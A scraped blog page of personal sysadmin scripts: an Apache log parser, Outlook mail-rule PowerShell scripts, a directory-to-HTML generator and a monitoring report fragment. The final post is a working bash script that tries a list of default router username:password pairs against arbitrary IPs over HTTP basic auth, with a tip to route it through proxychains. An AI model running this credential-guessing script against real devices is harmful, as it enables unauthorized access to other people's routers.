          $diff = $diff / 60 / 60;
          $diff = [int]$diff;
          if ( $diff -lt 25)
          {
            $faultyPr[$a] = $null;
          }
          else
          {
            $faultyPr[$a][1] = $profileProbes[$i][$j][$k][1];
            $faultyPr[$a][2] = $profiles[$i][$j][0];
          }
         }
         }
        }
      }
     }
     }
    }
  }
}
 
Write-host -foregroundcolor green "`b`b`tV"

# PRINTING INFO
Write-host -foregroundcolor green "`n PROFILES MISSING DATA: ";
  showFaultyProfiles;

Write-host -foregroundcolor green "`n UNRESPONSIVE TRANSACTIONS: ";
  showFaultyTransactions;

Write-host -foregroundcolor green "`n INACTIVE PROBES: ";
  drawHeader;

# SORTING TABLE
$faultyPr = $faultyPr | sort-object @{Expression={$_[1]}; Ascending=$true}
 
# PRINTING INACTIVE PROBES
for ( $i = 0; $i -lt $faultyPr.Length; $i++ )
{
  if ($faultyPr[$i])
  {
   $whatIWant = $origin.AddSeconds($faultyPr[$i][1]);
   $size = 21;
   $dateString = [string]$whatIWant
   $spaces = [int]([int]$size - [int]$dateString.Length)
   for ($j = 0; $j -lt $spaces; $j++)
   {
     $dateString = $dateString + " ";
   }
  
   $diff = $now - [int][double]::Parse(($faultyPr[$i][1]))
   $diff = $diff / 60 / 60;
   $diff = [int]$diff;
   $size = 12;
   $diffString = [string]$diff
   $spaces = [int]([int]$size - [int]$diffString.Length)
   for ($j = 1; $j -lt $spaces; $j++)
   {
     $diffString = " " + $diffString;
   }

   $size = 25;
   $probeString = [string]$faultyPr[$i][0]
   $spaces = [int]([int]$size - [int]$probeString.Length)
   for ($j = 1; $j -lt $spaces; $j++)
   {
     $probeString = " " + $probeString;
   }
   $size = 45;
   $transactionString = [string]$faultyPr[$i][2]
   $spaces = [int]([int]$size - [int]$transactionString.Length)
   for ($j = 1; $j -lt $spaces; $j++)
   {
     $transactionString = " " + $transactionString;
   }
   if ( $diff -gt 1440 )
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Magenta")
   }
   elseif ( $diff -gt 720 )
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Red")
   }
   elseif ( $diff -gt 168 )
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Yellow")
   }
   else 
   {
     printRow ($dateString) ($diffString) ($probeString) ($transactionString) ("Green")
   }
    drawLine;
 }
}
####################

Saturday, April 6, 2013

simple apache access log parser [with reverse DNS check and colors]

Entry moved here: http://wondershell.wordpress.com/2014/04/09/apache-access-log-parser/

Nothing special here really. Just a few lines of code to make the logs review a little bit easier.

Displayed columns in order from left to right: 

  1. Date and time of access 
  2. HTTP CODE of response [200 in green, 404 in blue, rest in red]
  3. IP address
  4. Reverse DNS hostname  [last 30 chars] [empty if NXDOMAIN]
  5. Request                       [first 30 chars] 


The output:



Script:


#!/bin/bash

while read line
do
        # IP
          ip=$(echo $line | cut -d " " -f 1)

        # HOST
          host=$(host $ip | cut -d " " -f 5 | tail -1)
          if [[ ${#ip} -lt 15 ]]; then
                for (( i=$(echo "15-${#ip}"|bc); i>0; i-- )) do
                        ip="$ip "
                done
          fi

        # IF I DO NOT GET DOMAIN NAME
          if [[ $(echo "$host" | grep "NXDOMAIN" | wc -l ) -ne 0 ]]; then
                host=" - "
          fi

        # EVEN UP THE HOSTNAME TO SEE LAST 30 CHARS
          if [[ ${#host} -lt 30 ]]; then
                for (( i=$(echo "30-${#host}"|bc); i>0; i-- )) do
                        host="$host "
                done
          else
                host=${host:$(echo "${#host}-30"|bc)}
          fi

          dhost="\033[01;30m$host\033[00m"

        #   DISPLAY GOOGLEBOT CUSTOM DNS               
          if [[ $(echo $host | grep google |wc -l) -eq 1 ]]; then
                dhost="\033[01;30mGOOGLEBOT\033[00m                     "
          fi

        # DATE
          date=$(echo $line | cut -d "[" -f 2 | cut -d "]" -f 1 | cut -d "+" -f 1)
                day=$(echo $date | cut -d ":" -f 1 | tr -d " ")
                dtime=$(echo $date | cut -d ":" -f 2- | tr -d " ")

        # REQUEST
          req=$(echo $line | cut -d "]" -f 2 | cut -d "\"" -f 2 | cut -d " " -f -2)
        # CUT REQUEST TO 30 CHARS
          dreq=${req:0:30}
        # CUSTOM REQUEST INFO IN CASE OF ADMIN PANEL
          if [[ $(echo $req | grep "admin.php" | wc -l) -eq 1 ]]; then
                dreq="\033[01;31mFAV\033[00m"
          fi

        # HTTP CODE
          code=$(echo $line | cut -d "\"" -f 3 | cut -d " " -f 2)
          hcode="\033[01;31m$code\033[00m";
          if [[ "$code" -eq "200" ]]; then
                hcode="\033[01;32m$code\033[00m";
          fi
          if [[ "$code" -eq "404" ]]; then
                hcode="\033[01;34m$code\033[00m";
          fi


        # DISPLAY
          # I DONT WANT TO DISPLAY FAVICON REQUESTS
          if [[ $(echo $req | grep "favicon.ico" | wc -l) -eq 1 ]]; then
                echo -n ""
          else
                echo -e "$day $dtime $hcode $ip $dhost $dreq"
          fi
done < /var/log/apache2/access.log

Monday, March 11, 2013

outlook rules (moving emails) with powershell - upgraded version

Entry moved here: http://wondershell.wordpress.com/2014/04/09/outlook-rules-with-powershell-script-moving-emails-to-pst-file/

I've modified previous script a bit, so that the code would be easier to understand and modify. 

This version is based on function display:

function display( [string]$subject, [string]$color )  {
  $len = 20
  if ( $subject.length -lt 20 ){
    $toadd=20-$subject.length;
    for ( $i=0; $i -lt $toadd; $i++ )
    {
      $subject=$subject+" ";
    }
    $len = $subject.length
  }
  else { $len = 20 }

  $index=$index+1
  Write-host -ForegroundColor $color -nonewline " |" ((($subject).ToString()).Substring(0,$len)).ToUpper() 
}


It takes two parameters:
     subject - the Email subject
     color    - the color that should be used to display particular email subject

Here is how it looks like now (sorry for cuts and blurs - had to do it):



SCRIPT:
# VARIABLES #

 # CREATE OUTLOOK INSTANCE
        $outlook = New-Object -comobject outlook.application
        $namespace = $outlook.GetNameSpace("MAPI")

 # PATH TO PST FILE
        $pstPath = "D:\PST\ALERT.pst"

 # ACCESS THE PST FILE AND MAP DESIRED FOLDERS
        $pst = $namespace.Stores | ?{$_.FilePath -eq $pstPath}
        $pstRoot = $pst.GetRootFolder()
        $pstFolders = $pstRoot.Folders
        $nagiosFolder = $pstFolders.Item("NAGIOS")

 # DEFAULT FOLDER 6 IS INBOX, 3 IS DELETED ITEMS
        $DefaultFolder = $namespace.GetDefaultFolder(6)
        $InboxFolders = $DefaultFolder.Folders
        $DeletedItems = $namespace.GetDefaultFolder(3)

        $Emails = $DefaultFolder

# BALLOON FUNCTION

function balloon([string]$text, [string]$title)
{
    if ($objBalloon)
    {
      # DELETE EXISTING BALLOON
      $objBalloon.Dispose()
    }

    [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
    $objBalloon = New-Object System.Windows.Forms.NotifyIcon
    $objBalloon.Icon = "C:\Windows\ServicePackFiles\i386\msnms.ico"

     # INFO, WARNING AND ERROR VALUES ARE ALLOWED
      $objBalloon.BalloonTipIcon = "Error"
      $objBalloon.BalloonTipTitle = "$title"
      $objBalloon.BalloonTipText = "$text"
      $objBalloon.Visible = $True

     # HOW LONG TO SHOW THE BALLOON
      $objBalloon.ShowBalloonTip(5000)
}

# DISPLAY FUNCTION

function display( [string]$subject, [string]$color )  {
  $len = 20
  if ( $subject.length -lt 20 )
  {
    $toadd=20-$subject.length;
    for ( $i=0; $i -lt $toadd; $i++ ){
      $subject=$subject+" ";
    }
    $len = $subject.length
  }
  else { $len = 20 }
  $index=$index+1
  Write-host -ForegroundColor $color -nonewline " |" ((($subject).ToString()).Substring(0,$len)).ToUpper() 
}


# PROCESSING EMAILS

foreach ($Email in $Emails) {
  $index=$index+1
        # FOUR SUBJECTS PER LINE
  if ( ($index % 4) -eq 0 ) {  Write-host -nonewline -ForegroundColor DarkGray " |`n" }

  if ($Email.To -eq "Surname, Name" -and $Email.Subject -notmatch "SPAM") {
      $Email.Move($nagiosFolder) | out-null
      display  ([string]$Email.Subject ) ([string]"Cyan")
      continue
  }
  if ($Email.Subject -match "SiteScope Alert, error") {
      $Email.Move($pstSubFolder.Item("SITESCOPE")) | out-null
      display  ([string]$Email.Subject ) ([string]"Yellow")
      continue
  }
    # DEFAULT BEHAVIOR IF NO MATCH IN RULES ABOVE
    display  ([string]$Email.Subject ) ([string]"DarkGray")
}


Friday, January 25, 2013

directory list to html with powershell

Entry moved here: http://wondershell.wordpress.com/2014/04/09/generating-html-file-from-directory-list/

There was a day when I was searching for some files inside a directory which had multiple subdirectories. Of course there is a Windows search tool that can help you to some extent but - it will not allow you to view multiple directories at the same time while highlighting files of particular kind - this is what I wanted. 
Below there is a powershell script that does exactly that listing directory content and creating a html file to let you see and (in some cases) easily open files.

Each file is displayed as a tile like this one:
On each tile there is a filename, file size and date of last modification

And the web page generated will look like this:

Tiles are grouped as they appear in directories. They have different colors - based on their extensions. In my case the black ones are txt files, yellow ones are html/htm files, violet ones are pdfs and pictures of common types are purple. The rest are displayed as gray.
The files that have colors other than gray can be opened in the browser by clicking on a tile. Most browsers do not support opening files like docx and others just by clicking on the url pointing at particular file. And the reason for this is that browser do not know a protocol that could handle such file. Thankfully you can create your own protocol but i will show it some other time.

For now you can open txt, cpp, c, hpp, h, gif, tiff, jpg, jpeg, png, bmp, pdf, html, htm files from the web page generated by the script.
File size is displayed in either Bytes, KiloBytes or MegaBytes - if the size is bigger than 1024 Bytes it will be shown in KiloBytes.
You can easily modify the script to add your coloring preference just by creating or altering a CSS style.

The script:


$global:current_dir="";
$global:open=0;
$root=($(pwd).Path).Length;

$out = "
<html>
  <head>
  <style>
    body {
      padding: 0px;
      margin: 0px;
      background-color: rgb(30,30,30);
      background-image: -ms-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: -moz-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: -o-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: -webkit-gradient(linear, left top, right bottom, color-stop(0, #3F0F63), color-stop(1, #930AEF));
      background-image: -webkit-linear-gradient(top left, #3F0F63 0%, #930AEF 100%);
      background-image: linear-gradient(to bottom right, #3F0F63 0%, #930AEF 100%);
    }
    div.directory {
      border: 2px solid rgb(155,155,155);
      border-bottom: 0px;
      padding: 5px;
      overflow:auto; 
    }
    div.dirtitle {
      font-family: Verdana;
      font-size: 11px;
      color: rgb(140,140,140);
      text-align:left;
      padding: 3px;
      margin: 3px;
      width: 95%;
    } 
    div.file {
      border: 2px solid rgb(30,30,30);
      width: 80px;
      height: 80px;
      float: left;
      position: relative;
      padding: 3px;
      text-align:center;
      color: white;
    }
    span.filename {
      font-family: Verdana;
      font-size: 12px;
      line-height: 40px;
    }
    span.filesize {
      font-family: Verdana;
      font-size: 10px;
    }
    span.mod_date {
      font-family: Verdana;
      font-size: 10px;
    }
    .word {
      background-color: rgb(82,82,82);
    }
    div.file:hover {
        border: 2px solid rgb(72,72,72);
    }
    .orange {
      background-color: rgb(218, 83, 44);
    }
    .green {
      background-color: rgb(0, 163, 0);
    }
    .purple {
      background-color: rgb(185, 29, 71);
    }
    .blue {
      background-color: rgb(45, 137, 239);
    }
    .yellow {
        background-color: rgb(255, 196, 13);
    }
    .violet {
      background-color: rgb(159, 0, 167);
    }
    .black {
      color: white;
      background-color: rgb(0, 0, 0);
    }
    .gray {
      background-color: rgb(100, 100, 100);
    }
    .red {
      background-color: rgb(224, 25, 61);
    } 
  </style> 
</head>
<body>";


Write-Output $out >> test.html ;

Get-ChildItem -recurse | where { $_.PSIsContainer -eq $false } |% { 
 # NO TILES FOR DIRECTORIES
 if ( [string]$global:current_dir -ne [string]$_.Directory ){
  if ( $global:open -eq 0 ) 
  {
   $global:open=1;
   $out= "<div id='directory' class='directory'> <div id='dirtitle' class='dirtitle'>" + $_.Directory + "</div>";
   Write-Output $out >> test.html ;
  }
  else 
  {
   $out = " </div><div id='directory' class='directory'> <div id='dirtitle' class='dirtitle'>" + $_.Directory + "</div> ";
   Write-Output $out >> test.html;
  }
  $global:current_dir=$_.Directory;
 }
 
 # CORRECTING PATH
 $relPath = $_.FullName.Remove(0, $root + 1)
 $relPath = $relPath -replace "\\", "/"
 
 # HTML
 if ( $_.Extension -eq ".html" -or $_.Extension -eq ".htm")
 {
  $out= "<div class='file yellow' onclick='window.location=`"" + ($relPath).trim() + "`"'>";
  Write-Output $out >> test.html ; 
 }
 # TEXT FILES
 elseif ( $_.Extension -eq ".txt" -or $_.Extension -eq ".cpp" -or $_.Extension -eq ".c" -or $_.Extension -eq ".h" -or $_.Extension -eq ".hpp") 
 {
  $out= "<div class='file black' onclick='window.location=`"" + $relPath + "`"'>";
  Write-Output $out >> test.html ;
 }
 # PDF
 elseif ( $_.Extension -eq ".pdf" ) 
 {
  $out= "<div class='file violet' onclick='window.location=`"" + $relPath + "`"'>";
  Write-Output $out >> test.html ;
 }
 # PICTURES
 elseif ( $_.Extension -eq ".jpg" -or $_.Extension -eq ".gif" -or $_.Extension -eq ".png" -or $_.Extension -eq ".jpeg" -or $_.Extension -eq ".bmp" -or $_.Extension -eq ".tiff" ) 
 {
  $out= "<div class='file purple' onclick='window.location=`"" + $relPath + "`"'>";
  Write-Output $out >> test.html ;
 }
 else 
 { 
  $out = "<div class='file gray' >";
  Write-Output $out >> test.html 
 }
 
 # REMOVING HYPHEN FROM FILENAMES
 # SINCE IT CAUSES MULTIPLE LINES 
 # TO BE GENERATED PER FILENAME
 $sanit= $_.BaseName -replace "-", "_"

 # SHOWS ONLY FIRST 9 CHARACTERS FROM FILE NAME
 # TO AVOID OVERFLOW
 if ( ($sanit).Length -gt 9 )
 {
  $out= "`t<span id='filename' class='filename'>" + ($sanit).Substring(0,9) + "</span><br> ";
 }
 else 
 {
  $out= "`t<span id='filename' class='filename'>" + $sanit + "</span><br> ";
 }
 Write-Output $out >> test.html;

 $var=$_.Length;

 # SIZE BIGGER THAN MB
 if ( $var -gt 1048576 )
 {
  $var=$var/1048576;
  $var = "{0:N2}" -f $var
  $out = "`t<span id='filesize' class='filesize'>" + ([string]$var).trim() + " MB</span><br>";
  Write-Output $out >> test.html;
 }
 else 
 {
  # SIZE BIGGER THAN KB
  if ( $var -gt 1024 )
  {
   $var=$var/1024;
   $var = "{0:N2}" -f $var
   $out = "`t<span id='filesize' class='filesize'>" + ([string]$var).trim() + " KB</span><br>";
   Write-Output $out >> test.html;
  }
  else 
  {
   $out = "`t<span id='filesize' class='filesize'>" + ([string]$var).trim() + " B</span><br>";
   Write-Output $out >> test.html;
  }
 }
 $out = "`t<span id='mod_date' class='mod_date'>" + $_.LastWriteTime + "<span><br>"
 Write-Output $out >> test.html ;
 Write-Output "</div>" >> test.html;
 Write-Output "`n" >> test.html;
}
Write-Output "</div></body></html>" >> test.html;

Tuesday, January 22, 2013

outlook rules with powershell [without 32 KB storage limit]

Entry moved here: http://wondershell.wordpress.com/2014/04/09/outlook-rules-with-powershell-script-moving-emails-to-pst-file/


Have you ever reached the size limit of the rules that you can setup in Microsoft Outlook? Well, I did. By default it is 32 Kb which can be extended to 256 Kb. Still, if you receive couple of hundreds emails per day - like myself - maybe you will appreciate the fact that you don't have to be limited to mentioned thresholds. There is a fairly simple solution and it's name is - Powershell.
Below you will find a powershell script with a couple of example rules and a bonus function for displaying balloon tooltips. It is designed to work with PST file but if you have large mailbox quota you don't have to move emails outside of your exchange mailbox. 

This is how it will look like in console:

Here is how balloon tooltip will look like:

If You do not want to manually start the script you can use scheduled task and batch file similar to this one:

  @ECHO OFF
  TITLE "RULES"
  COLOR 0A
  CLS
  MODE CON COLS=30 LINES=10
  CD "D:\"
  powershell.exe .\RULES.ps1 >> rules.log

Or, if You do not want to see anything at all, You can use vbscript like this one:

  Dim shell, command
  command = "powershell.exe -nologo D:\RULES.ps1"
  Set shell = CreateObject("WScript.Shell")
  shell.Run command,0

Additionally, You can create hyperlink to one of those files (batch or vbscript) and associate it with a button in Outlook GUI:


Script:

# VARIABLES #

 # CREATE OUTLOOK INSTANCE
        $outlook = New-Object -comobject outlook.application
        $namespace = $outlook.GetNameSpace("MAPI")

 # PATH TO PST FILE
        $pstPath = "D:\PST\ALERT.pst"

 # ACCESS THE PST FILE AND MAP DESIRED FOLDERS
        $pst = $namespace.Stores | ?{$_.FilePath -eq $pstPath}
        $pstRoot = $pst.GetRootFolder()
        $pstFolders = $pstRoot.Folders
        $nagiosFolder = $pstFolders.Item("NAGIOS")

 # DEFAULT FOLDER 6 IS INBOX, 3 IS DELETED ITEMS
        $DefaultFolder = $namespace.GetDefaultFolder(6)
        $InboxFolders = $DefaultFolder.Folders
        $DeletedItems = $namespace.GetDefaultFolder(3)

        $Emails = $DefaultFolder.Items

# BALLOON FUNCTION

function balloon([string]$text, [string]$title)
{
        if ($objBalloon)
        {
         # delete existing balloon #
                $objBalloon.Dispose()
        }

                [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
                $objBalloon = New-Object System.Windows.Forms.NotifyIcon
                $objBalloon.Icon = "C:\Windows\ServicePackFiles\i386\msnms.ico"

         # Info, Warning and Error values are allowed
                $objBalloon.BalloonTipIcon = "Error"

         # Put what you want to say here for the Start of the process
                $objBalloon.BalloonTipTitle = "$title"
                $objBalloon.BalloonTipText = "$text"
                $objBalloon.Visible = $True

         # How long should the balloon be visible
                $objBalloon.ShowBalloonTip(5000)
}

# PROCESSING EMAILS

Foreach ($Email in $Emails)
{
        # UNCOMMENT NEXT LINE IF YOU WANT TO SEE
        # ALL EMAILS THAT ARE BEING REVIEWED
        # Write-host " " $Email.SentOn " :`t" $Email.Subject

        # MOVING TO NAGIOS FOLDER # MATCHING BY SUBJECT

        IF ($Email.Subject -match "Nagios Critical Alert")
        {
                $Email.Move($nagiosFolder) | out-null
                Write-host -ForegroundColor Green " " $Email.SentOn " :`t" $Email.Subject

                # DISPLAY BALLON
                balloon ([string]$Email.Subject) ([string]$Email.SentOn)
        }
        IF ($Email.Subject -match "Nagios Alert" -or $Email.Subject -match "Nagios Warning" )
        {
                $Email.Move($nagiosFolder) | out-null
                Write-host -ForegroundColor Green " " $Email.SentOn " :`t" $Email.Subject
        }

        # MOVING TO DELETED ITEMS # MATCHING BY SENDER

        IF ($Email.SenderEmailAddress -match "/O=CORPORATE/OU=GROUP/CN=RECIPIENTS/CN=SOME")
        {
                # MARKING AS UNREAD (TO SEE HOW MANY ITEMS HAVE BEEN DELETED)
                $Email.UnRead = $True

                # MOVE
                $Email.Move($DeletedItems) | out-null
                Write-host -ForegroundColor Red " " $Email.SentOn " :`t" $Email.Subject
        }
        IF ($Email.SenderEmailAddress -match "spammer@ads.com")
        {
                $Email.Move($DeletedItems) | out-null
                Write-host -ForegroundColor Red " " $Email.SentOn " :`t" $Email.Subject
        }
}

find routers with default password


Entry moved here: http://wondershell.wordpress.com/2014/04/09/find-routers-with-default-password/

Another day, another script...

This script assumes you have a list of ip addresses stored in one file and list of username:password pairs in the other. There are some variables within the script itself which allow you to limit the search to the hosts that respond to ICMP echo requests or display only those IP's that responded to ping. This is designed such way because some hosts might not respond to ICMP echo request and still have open port 80.

Example content of username:password file:

  admin:admin
  admin:password
  admin:
  ADSL:expert03
  ZXDSL:ZXDSL
  admin:administrator
  admin:comcast
  admin:1234

Here is script output produced when displaying all IPs and their statuses:



..and the other output displaying only 'Alive' ones:




  ALIVE means host responded to ping. 
  200 means HTTP server response on port 80 was HTTP/1.* 200 OK
  401 means HTTP server requested authorisation - this is what we are looking for.     
    
    Vertical bars after 401 status indicate username:password pairs used to    
    authenticate. If correct pair is found - it is displayed after PASS.

Finaly, the script itself:
#!/bin/bash

#=================#
#    VARIABLES    #
#=================#

  ips=`cat ip.list`
  users=`cat users.list`
  PING_CHECK=0
  DISPLAY_DEAD=1

# FOR ALL IP ADDRESSES IN THE FILE

for ip in $ips; do

  # IF  YOU WANT TO LIMIT THE CHECK TO ONLY 
  # REACHABLE BY ICMP SET PING_CHECK VARIABLE

  if [[ $PING_CHECK -eq 1 ]];then
    connection=`ping -W 1 -c 1 $ip | grep "1 packets" | grep -v "errors" | cut -d " " -f 6 | cut -b 1`
  else
    connection=0
  fi

  if [[ $connection -eq 0 ]]; then
    if [[ $PING_CHECK -eq 1 ]]; then

      # ALIVE MEANS REACHABLE BY PING

      echo -ne "\n $ip\t\033[1;32mALIVE\033[0m "; 
    else
      echo -ne "\n $ip\t";
    fi

    flag=0
    while [[ $flag -eq 0 ]]; do

    # SET THE CURL TO USE PROXY WITH -x PARAMETER 
    # OR RUN SCRIPT VIA PROXYCHAIN

      header=`curl --connect-timeout 3 -I -s $ip --location | head -1`
      web=`echo $header | grep " 200" | wc -w`
      auth=`echo $header | grep "HTTP/1.1 401" | wc -w`

      if [[ $web -gt 1 ]]; then
        
        # HTTP/1.* 200 OK - WEB SERVER FOUND

        echo -ne "\t \033[37m-> 200\033[0m " 
      fi

      if [[ $auth -gt 1 ]]; then

        # HTTP/1.* 401 AUTHORIZATION REQUIRED

        echo -ne "\t \033[37m-> 401\033[0m " 


        # TRY AUTHENTICATE WITH COMMON USERNAMES 
        # AND PASSWORDS FROM $users FILE

        for user in $users; do
          passcheck=`curl --connect-timeout 3 -I -s -u $user $ip --location | head -1 | grep "HTTP/1.1 401" | wc -w`
          if [[ $passcheck -lt 1 && $flag -eq 0 ]]; then
            

            # DISPLAY PASSWORD IF FOUND

            echo -ne "\t\033[32mPASS: $user\033[0m"; 

            flag=1
            break;
          else
            echo -ne "\033[37m|\033[0m";
          fi
        done
      fi
      flag=1
    done
  else
    # IF YOU WANT TO SEE ALL IP ADDRESSES THAT ARE BEING CHECKED
    # SET $DISPLAY_DEAD
    if [[ $DISPLAY_DEAD -eq 1 ]]; then
      echo -ne "\n $ip\t\033[31mDEAD\033[0m ";
    fi
  fi
done